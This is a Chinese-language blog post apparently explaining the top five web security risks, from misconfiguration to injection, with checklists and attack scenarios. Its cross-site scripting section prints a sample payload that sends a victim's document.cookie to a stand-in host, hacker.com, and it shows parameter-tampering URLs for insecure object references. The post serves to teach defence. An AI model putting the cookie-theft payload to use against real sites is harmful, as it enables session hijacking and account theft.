網站安全風險前五名

網站安全風險前五名

這篇文章主要介紹網站資訊安全風險排行榜前五名,

分別針對每一個風險說明資訊安全風險的情境,網站保護的建議

 

5. Security Misconfiguration

如何檢查

  1. 使用的軟體或是系統元件是否有過期沒有更新? 例如作業系統、網站、資料庫、程式庫等。駭客會利用已知的弱點進行攻擊。
  2. 額外安裝其他不需要的服務。例如:ports、服務、Demo網頁、Demo帳號
  3. 是否有預設的帳號與密碼沒有改變
  4. 是否有過多額外的錯誤訊息,例如版本資訊、語法錯誤等
  5. 各個程式語言架構相關的資訊安全設定

駭客攻擊情境

  1. 網站預設的帳號密碼沒有更改,駭客用預設的系統管理頁面登入
  2. 網站 Directory listing 沒有取消,因此駭客可以輕易地瀏覽該網站所有的檔案與路徑,進一步找到相關的程式與系統資訊。
  3. Demo或是示範的網站沒有被移除。例如 IIS 或是資料庫安裝後都會有預設的 Demo WebSite。該Demo Website 有淺在已知的風險。駭客藉由這些 web攻擊。

 

4.Insecure Object Reference

這個攻擊說明的是駭客可以透過一些方法讀取重要的系統資源、資料庫資訊、檔案等

駭客攻擊情境

  1. 駭客透過 Google 間接取得連結,存取重要檔案、PDF、Image等網址,而不需要驗證。
  2. 駭客透過參數的修改間接取得其他權限的資訊內容。例如修改部門參數,取得其他部門資訊:

http://vulsite.com/app/accountInfo?acct=FIN

http://vulsite.com/app/accountInfo?acct=ENG

http://vulsite.com/app/accountInfo?acct=HR

 

3. Cross-Site Scripting XSS

也就是俗稱的 JavaScript Injection。

透過 JavaScript 的輸入,讓網站或是受害使用者間接執行非預期的結果。

駭客攻擊情境

  1. 透過訪客留言版輸入 JavaScript,讓其他受訪者瀏覽到該留言版時,間接執行有害的 JavaScript
  2. 透過 URL 或是參數執行 JavaScript ,讓受害者誤點擊URL 而執行

舉例來說,駭客透過下列的 Script 將 cookie 讀取(document.cookie)之後,

傳送至 hacker.com 的網站,

Hacker.com 網站透過cookie.cgi將 cookie讀取至變數 Stolen_cookie

 

‘><script>document.location= ‘http://www.hacker.com/cookie.cgi ?Stolen_Cookie=’+document.cookie</script>’.

 

2. Broken Authentication & Session Management

這類主要指的是帳號密碼驗證,與登入之後相關 Session 的管理,舉例來說:

  1. 密碼是否有經過 Hash或是加密處理.
  2. 密碼的管理、帳號建立、密碼修改、密碼重設等
  3. Session IDs 是否很容易猜到.
  4. Session IDs 是否在一段時間沒有使用之後會自動失效
  5. Session IDs 是否會重複被使用
  6. 密碼與帳號是否在傳輸過程中有加密

 

1. Injection

這類廣泛指的是 SQL, OS , 各種的 Injection

透過非法字元的輸入讓網站或是系統執行非預期的 scripts.造成非預期的結果

 

Leave a Reply

Your email address will not be published. Required fields are marked *